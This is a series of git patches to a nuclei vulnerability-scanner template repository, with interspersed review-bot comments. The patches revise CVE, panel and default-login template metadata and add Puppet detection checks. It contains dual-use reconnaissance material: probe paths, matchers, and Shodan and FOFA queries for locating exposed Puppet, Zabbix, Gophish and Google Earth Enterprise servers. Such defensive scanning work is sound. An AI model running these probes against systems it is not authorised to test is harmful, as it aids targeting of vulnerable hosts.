id: CVE-2022-24124
info:
- name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
+ name: Casdoor 1.13.0 - Unauthenticated SQL Injection
author: cckuailong
severity: high
- description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
+ description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability. The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
+ - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
- https://www.exploit-db.com/exploits/50792
- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
@@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/08
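Review bot: The description now states twice that the issue is in 1.13.0 / before 1.13.1, yet the template has no `remediation:`; the version bound is already given, so add `remediation: Upgrade to Casdoor 1.13.1 or later.` The status-200 matcher at the end of the hunk is the weak part of an SQL injection check; confirm that a body or timing matcher above the hunk (not visible here) carries the actual detection.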
From 28a422d6584c04a07989be22cd0dfd9572def786 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:57:25 -0500
Subject: [PATCH 106/259] Enhancement: cves/2022/CVE-2022-24260.yaml by mp
---
cves/2022/CVE-2022-24260.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-24260.yaml b/cves/2022/CVE-2022-24260.yaml
index 1e6f03426b..40939405dd 100644
--- a/cves/2022/CVE-2022-24260.yaml
+++ b/cves/2022/CVE-2022-24260.yaml
@@ -1,7 +1,7 @@
id: CVE-2022-24260
info:
- name: VoipMonitor - Pre-Auth SQL injection
+ name: VoipMonitor - Pre-Auth SQL Injection
author: gy741
severity: critical
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
@@ -44,4 +44,6 @@ requests:
extractors:
- type: kval
kval:
- - PHPSESSID
\ No newline at end of file
+ - PHPSESSID
+
+# Enhanced by mp on 2022/03/08
From 161ba2c6a25837219e0a6a4669846c0a5117d21d Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:29:12 -0500
Subject: [PATCH 107/259] Enhancement: cves/2022/CVE-2022-0692.yaml by mp
---
cves/2022/CVE-2022-0692.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml
index ea0605c14f..8afb4f3093 100644
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@@ -4,7 +4,7 @@ info:
name: Rudloff alltube prior to 3.0.1 - Open Redirect
author: 0x_Akoko
severity: medium
- description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist rudloff/alltube in versions prior to 3.0.1."
+ description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1."
reference:
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
- https://www.cvedetails.com/cve/CVE-2022-0692
From eebef82c6a61e48a4421a5c52f14c37165e4d3a2 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:31:20 -0500
Subject: [PATCH 108/259] Enhancement: cves/2022/CVE-2022-21371.yaml by mp
---
cves/2022/CVE-2022-21371.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-21371.yaml b/cves/2022/CVE-2022-21371.yaml
index 05d2b3a606..32db7db2f1 100644
--- a/cves/2022/CVE-2022-21371.yaml
+++ b/cves/2022/CVE-2022-21371.yaml
@@ -4,7 +4,7 @@ info:
name: Oracle WebLogic Server Local File Inclusion
author: paradessia,narluin
severity: high
- description: An easily exploitable local file inclusion vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data.
+ description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
reference:
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
From 295de3ec7bd5494b2412eb7ad3ea10f0c9cb6ca9 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:33:02 -0500
Subject: [PATCH 109/259] Enhancement: cves/2022/CVE-2022-22536.yaml by mp
---
cves/2022/CVE-2022-22536.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-22536.yaml b/cves/2022/CVE-2022-22536.yaml
index e307de2556..74c587f66e 100644
--- a/cves/2022/CVE-2022-22536.yaml
+++ b/cves/2022/CVE-2022-22536.yaml
@@ -4,13 +4,13 @@ info:
name: SAP Memory Pipes (MPI) Desynchronization
author: pdteam
severity: critical
- description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+ description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
- https://github.com/Onapsis/onapsis_icmad_scanner
- https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
- tags: cve,cve2022,sap,smuggling
+ tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
From 2d350e0a2f1e09fabd2cd124d3b41a38bcbe3c8c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:35:20 -0500
Subject: [PATCH 110/259] Enhancement: cves/2022/CVE-2022-23134.yaml by mp
---
cves/2022/CVE-2022-23134.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-23134.yaml b/cves/2022/CVE-2022-23134.yaml
index 5df57e33c8..53aca6a04f 100644
--- a/cves/2022/CVE-2022-23134.yaml
+++ b/cves/2022/CVE-2022-23134.yaml
@@ -1,7 +1,7 @@
id: CVE-2022-23134
info:
- name: Zabbix Setup Configuration - Unauthenticated Access
+ name: Zabbix Setup Configuration Authentication Bypass
author: bananabr
severity: medium
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
From acb55f3c062190b1ee7efb1a9ddf7653e4ba73cd Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:36:49 -0500
Subject: [PATCH 111/259] Enhancement: cves/2022/CVE-2022-23808.yaml by mp
---
cves/2022/CVE-2022-23808.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-23808.yaml b/cves/2022/CVE-2022-23808.yaml
index 0bdfac1747..a75c89c2f3 100644
--- a/cves/2022/CVE-2022-23808.yaml
+++ b/cves/2022/CVE-2022-23808.yaml
@@ -4,7 +4,7 @@ info:
name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
author: cckuailong
severity: medium
- description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
+ description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
reference:
- https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
- https://github.com/dipakpanchal456/CVE-2022-23808
@@ -39,4 +39,4 @@ requests:
words:
- "\">'>"
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/03/08
From 7cd9e673caab1741601084e4fb1c658063b59778 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:38:46 -0500
Subject: [PATCH 112/259] Enhancement: cves/2022/CVE-2022-24124.yaml by mp
---
cves/2022/CVE-2022-24124.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-24124.yaml b/cves/2022/CVE-2022-24124.yaml
index 31aa5390ef..f940ce92b6 100644
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@@ -4,7 +4,7 @@ info:
name: Casdoor 1.13.0 - Unauthenticated SQL Injection
author: cckuailong
severity: high
- description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability. The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
+ description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
- https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
- https://www.exploit-db.com/exploits/50792
From 67e20bc87f63607651545cf5717ff4ccdeee7c3a Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 9 Mar 2022 00:17:22 +0530
Subject: [PATCH 114/259] puppet templates
---
cves/2020/CVE-2020-7943.yaml | 38 +++++++++++++++++++++++++++
exposed-panels/puppetboard-panel.yaml | 22 ++++++++++++++++
technologies/puppetdb-detect.yaml | 34 ++++++++++++++++++++++++
technologies/puppetserver-detect.yaml | 35 ++++++++++++++++++++++++
4 files changed, 129 insertions(+)
create mode 100644 cves/2020/CVE-2020-7943.yaml
create mode 100644 exposed-panels/puppetboard-panel.yaml
create mode 100644 technologies/puppetdb-detect.yaml
create mode 100644 technologies/puppetserver-detect.yaml
diff --git a/cves/2020/CVE-2020-7943.yaml b/cves/2020/CVE-2020-7943.yaml
new file mode 100644
index 0000000000..1f5454db70
--- /dev/null
+++ b/cves/2020/CVE-2020-7943.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-7943
+
+info:
+ name: Puppet Server and PuppetDB sensitive information disclosure
+ severity: high
+ author: c-sh0
+ description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
+ reference:
+ - https://puppet.com/security/cve/CVE-2020-7943
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-7943
+ - https://tickets.puppetlabs.com/browse/PDB-4876
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-7943
+ cwe-id: CWE-276
+ tags: cve,cve2020,puppet,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/metrics/v1/mbeans"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: word
+ part: body
+ words:
+ - "trapperkeeper"
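Review bot: The `description` at line 3273 speaks of "metrics API endpoints" in general and ends without a period, while the template probes exactly one path, `/metrics/v1/mbeans` (line 3288), and keys on `trapperkeeper` in the body; a reader triaging a finding should be told which endpoint answered. Suggest `description: Puppet Server and PuppetDB expose performance and debugging data via their metrics API (/metrics/v1/mbeans is probed here), which may contain sensitive information.` The body word is the only product-specific signal and it is shared by both products named in `name`, so the description should also make clear that the template does not distinguish Puppet Server from PuppetDB.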
diff --git a/exposed-panels/puppetboard-panel.yaml b/exposed-panels/puppetboard-panel.yaml
new file mode 100644
index 0000000000..756a13079d
--- /dev/null
+++ b/exposed-panels/puppetboard-panel.yaml
@@ -0,0 +1,22 @@
+id: puppetboard-panel
+
+info:
+ name: Puppetlabs Puppetboard
+ author: c-sh0
+ severity: info
+ metadata:
+ shodan-query: http.title:"Puppetboard"
+ tags: panel,puppet,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Puppetboard"
\ No newline at end of file
diff --git a/technologies/puppetdb-detect.yaml b/technologies/puppetdb-detect.yaml
new file mode 100644
index 0000000000..b5d55d64bf
--- /dev/null
+++ b/technologies/puppetdb-detect.yaml
@@ -0,0 +1,34 @@
+id: puppetdb-detect
+
+info:
+ name: PuppetDB Detection
+ author: c-sh0
+ severity: info
+ reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version
+ tags: puppet,tech,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pdb/meta/v1/version"
+
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: word
+ part: body
+ words:
+ - '"version"'
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - '"version"\s:\s"([0-9.]+)"'
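Review bot: `matchers` at line 3354 lists three matchers but no `matchers-condition`, so nuclei's default of `or` applies and any 200 response, or any `application/json` response, is reported as a PuppetDB detection; the sibling `cves/2020/CVE-2020-7943.yaml` and `technologies/puppetserver-detect.yaml` hunks in this same commit both set `matchers-condition: and`. Add `matchers-condition: and` on the line above `matchers:` so all three must hold. The extractor regex at line 3373 also demands exactly one whitespace character on each side of the colon; if the server emits `"version":"<x.y.z>"` with no spaces the extractor silently yields nothing, so `'"version"\s*:\s*"([0-9.]+)"'` is the safer pattern.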
diff --git a/technologies/puppetserver-detect.yaml b/technologies/puppetserver-detect.yaml
new file mode 100644
index 0000000000..08ee862fbb
--- /dev/null
+++ b/technologies/puppetserver-detect.yaml
@@ -0,0 +1,35 @@
+id: puppetserver-detect
+
+info:
+ name: Puppetserver Detection
+ author: c-sh0
+ severity: info
+ reference: https://insinuator.net/2020/09/puppet-assessment-techniques/
+ tags: tech,puppet,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 404
+
+ - type: word
+ part: header
+ words:
+ - "x-puppet-version"
+ case-insensitive: true
+
+ - type: word
+ part: body
+ words:
+ - "{{randstr}}"
+
+ extractors:
+ - type: kval
+ kval:
+ - x_puppet_version
\ No newline at end of file
From 650f9ea355aeeb15dc6604d917db67773959fc0a Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 15:18:50 -0500
Subject: [PATCH 115/259] Enhancement:
default-logins/google/google-earth-dlogin.yaml by mp
---
default-logins/google/google-earth-dlogin.yaml | 14 +++++++++++---
1 file changed, 11 insertions(+), 3 deletions(-)
diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml
index 8e29091076..f6c4e88387 100644
--- a/default-logins/google/google-earth-dlogin.yaml
+++ b/default-logins/google/google-earth-dlogin.yaml
@@ -4,8 +4,14 @@ info:
name: Google Earth Enterprise Default Login
author: orpheus,johnjhacking
severity: high
- tags: default-login,google
- reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
+ description: Google Earth Enterprise default login credentials were discovered.
+ remediation: "To reset the username and password:
+sudo /opt/google/gehttpd/bin/htpasswd -c
+/opt/google/gehttpd/conf.d/.htpasswd geapacheuse"
+ tags: default-login,google-earth
+ reference:
+ - https://johnjhacking.com/blog/gee-exploitation/
+ - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
metadata:
shodan-query: 'title:"GEE Server"'
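Review bot: The `remediation` value at lines 3436-3438 is a double-quoted scalar whose continuation lines, as rendered here, start at column 0; YAML requires continuation lines of a flow scalar inside a block mapping to be indented more than the key, so strict parsers reject this even where nuclei's loader happens to accept it, and the line breaks are folded into spaces anyway, so the sentence and the command run together. A literal block scalar keeps the intent and parses everywhere: `remediation: |-`, then indented `To reset the username and password:` and `sudo /opt/google/gehttpd/bin/htpasswd -c /opt/google/gehttpd/conf.d/.htpasswd geapacheuse` on the next two lines. The trailing `geapacheuse` also looks truncated — check the account name against the referenced opengee page before this ships, since a copy-pasted wrong username makes the remediation fail.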
@@ -34,4 +40,6 @@ requests:
condition: and
words:
- 'DashboardPanel'
- - 'Earth Enterprise Server'
\ No newline at end of file
+ - 'Earth Enterprise Server'
+
+# Enhanced by mp on 2022/03/08
From 218c39a886e044695b945de3c1375600b0b7d0a1 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 15:37:51 -0500
Subject: [PATCH 116/259] Enhancement:
default-logins/gophish/gophish-default-login.yaml by mp
---
default-logins/gophish/gophish-default-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/gophish/gophish-default-login.yaml b/default-logins/gophish/gophish-default-login.yaml
index 9b2b924bb1..0f459602a9 100644
--- a/default-logins/gophish/gophish-default-login.yaml
+++ b/default-logins/gophish/gophish-default-login.yaml
@@ -1,10 +1,13 @@
id: gophish-default-login
info:
- name: Gophish < v0.10.1 default credentials
+ name: Gophish < v0.10.1 Default Credentials
author: arcc,dhiyaneshDK
severity: high
tags: gophish,default-login
+ description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary.
+ reference:
+ - https://docs.getgophish.com/user-guide/getting-started
requests:
- raw:
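Review bot: The added `description` at line 3475 describes the post-fix behaviour (temporary credentials printed to the log for versions above 0.10.1), not the condition this template detects, whose `name` is `Gophish < v0.10.1 Default Credentials`; someone triaging a hit is told about the safe behaviour and nothing about why the match matters. Suggest `description: Gophish versions prior to 0.10.1 ship with a fixed default administrator credential; from 0.10.1 onward a temporary, randomly generated password is printed to the log on first start instead.` The `tags`/`description`/`reference` ordering at lines 3474-3476 also differs from the `description`-then-`reference`-then-`tags` order used by the other templates in this series. The raw request that actually carries the credential check is outside this hunk.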
@@ -43,4 +46,6 @@ requests:
- "contains(tolower(all_headers), 'location: /')"
- "contains(tolower(all_headers), 'gophish')"
- "status_code==302"
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/08
From 48675b803ab30053e8f75af2c06cd9c6f22e1b10 Mon Sep 17 00:00:00 2001
From: sullo
Date: Tue, 8 Mar 2022 17:38:14 -0500
Subject: [PATCH 117/259] Fix control character issue
---
cves/2022/CVE-2022-23131.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml
index 86f675074b..53811d3852 100644
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@@ -13,7 +13,7 @@ info:
- https://github.com/1mxml/CVE-2022-23131
metadata:
shodan-query: http.favicon.hash:892542951
- fofa-query: app="ZABBIX-çæ§ç³»ç»" && body="saml"
+ fofa-query: app="ZABBIX-监控系统" && body="saml"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
From e994e4ae557fb561a798046113c18cc52132c593 Mon Sep 17 00:00:00 2001
From: Arr0way
Date: Tue, 8 Mar 2022 22:54:09 +0000
Subject: [PATCH 118/259] Added Matomo Login Portal Pannel Template
Added Matomo Login Portal Panel Template
---
exposed-panels/matomo-login-portal.yaml | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 exposed-panels/matomo-login-portal.yaml
diff --git a/exposed-panels/matomo-login-portal.yaml b/exposed-panels/matomo-login-portal.yaml
new file mode 100644
index 0000000000..d826ec6df7
--- /dev/null
+++ b/exposed-panels/matomo-login-portal.yaml
@@ -0,0 +1,21 @@
+id: matomo-login-portal
+
+info:
+ name: Matomo Login Portal
+ author: Arr0way
+ severity: info
+ tags: panel
+ description: Matomo provides website analytics
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+ - "{{BaseURL}}/matomo"
+ redirects: true
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - "Sign in - Matomo"
+ part: body
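Review bot: `matchers-condition: or` at line 3539 governs a single matcher, so it has no effect and reads as if a second matcher were planned; either drop it, or add a status matcher and switch to `and`. `redirects: true` at line 3538 has no `max-redirects`, so the probe follows nuclei's default redirect limit on two paths; the `puppetboard-panel.yaml` hunk earlier in this series caps it with `max-redirects: 2`, which is worth copying. The `description` at line 3531 describes the product rather than what the template reports; `description: Matomo login portal was detected.` matches the convention of the other panel templates, and moving `tags` below `description` would match their key order too.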
From e2fa9a0386a96035184da8dfa1e08242d9578e59 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Wed, 9 Mar 2022 15:18:50 +0700
Subject: [PATCH 120/259] Update axigen-webmail.yaml
Added axigen version extractor
---
exposed-panels/axigen-webmail.yaml | 9 ++++++++-
1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml
index ea433c21e8..ff710d0626 100644
--- a/exposed-panels/axigen-webmail.yaml
+++ b/exposed-panels/axigen-webmail.yaml
@@ -2,7 +2,7 @@ id: axigen-webmail
info:
name: Axigen WebMail
- author: dhiyaneshDk
+ author: dhiyaneshDk,idealphase
severity: info
description: This template determines if Axigen Webmail is running.
reference:
@@ -26,4 +26,11 @@ requests:
status:
- 200
+ extractors:
+ - type: regex
+ group: 1
+ part: body
+ regex:
+ - '